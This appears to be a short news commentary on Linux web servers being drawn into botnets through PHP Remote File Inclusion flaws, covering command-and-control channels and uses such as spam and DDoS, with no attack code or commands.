Collections of subverted machines, called
botnets are typically
associated with Windows; thousands of zombie desktops sending spam and
causing other internet mayhem. Unfortunately, it is increasingly clear
that Linux boxes (as well as MacOS X and other UNIX boxes) are
participating in botnets, but in a bit of a twist, it is mostly servers
that have been subverted. Botnets are an enormous problem that
Vint Cerf recently
may involve up to one quarter of all internet connected computers. This
translates to a botnet controller's fondest wish: 150 million zombie machines
to rent to the highest bidder.
Desktops are usually infected with a bot by an email-borne virus or a
trojan attached to some application that the user installs, much like
adware and spyware infect machines. The bot software then connects to a
'command and control' (C&C) infrastructure, that often use Internet Relay
Chat (IRC) servers, to get instructions on what they should do. The 'owner'
of a botnet (known as a bot herder) can then instruct the bots to do whatever
they, or more likely their client, want. Because the traffic
generated from a botnet comes from all over the Internet, it is difficult
or impossible to recognize it for what it is. This allows botnets to be
used for spamming, distributed denial of service (DDOS) attacks, click fraud and
other malicious activities in a largely untraceable way.
The desktop infection methods are not typically as useful for Linux boxes
and so bot herders have turned to web application exploits as a means
for collecting subverted machines. Attacking servers has the additional
advantage that they are usually machines with much greater resources:
faster network connectivity, more storage, faster processors, etc. The attacks
are largely targeted at everyone's favorite Internet security whipping
boy, PHP applications. Open source PHP applications are the
main target as they are ubiquitous and typically easy to exploit as
indicates. An additional benefit of targeting a higher level application
is that it is a cross-platform exploit; the operating system and web server
software are immaterial if the target is a PHP application.
The easiest type of vulnerability to exploit is often
Inclusion (RFI) which allows an attacker to run code on a
vulnerable server with the permissions of the webserver. Generally,
those permissions are sufficient to allow the bot to do anything the herder
might wish it to; sending email and other network traffic is not normally a privileged
activity. Even a cursory glance at the Bugtraq mailing list will reveal
numerous RFI vulnerabilities; they are reported regularly and each can lead
to bot exploitation if not patched.
Many different types of malware can be installed on a vulnerable machine,
depending on the intent of the herder. As with the exploit itself, the
installed code tends to be written in a scripting language so that it is
cross-platform. The malware can range from simple test tools
that indicate vulnerable servers to sophisticated shells that allow the
attacker to effectively login to the server and perform any allowed operation.
The most serious damage that these botnets have caused is to our
inbox; bots seem to be the preferred way to deliver spam these days.
Diligent anti-spam efforts tend to get spamming accounts or systems shut
down within hours but there is no easy way to shut down a spam-delivering botnet. A less
visible, but potentially more damaging effect is DDOS
on internet sites. By attacking a site and working their way up the
chain of DNS servers and registrars, a botnet can silence a site the herder
does not like or hold sites hostage until they pay a ransom.
Past efforts to thwart botnets have often focused on destroying the C&C
servers by shutting down the affected IRC sites, but botnets are
moving toward using HTTP for C&C which allows that traffic to hide amongst
the sea of similar traffic; it also has the advantage of getting through
most firewalls. Botnets will be a serious problem going forward, and Linux
systems are not immune to participation in them. The
financial incentive is large and the means of prevention are weak, at least
so far. As we have learned by trying to deal with spam, money makes our
adversaries much more inventive which makes long-term solutions hard to
to post comments)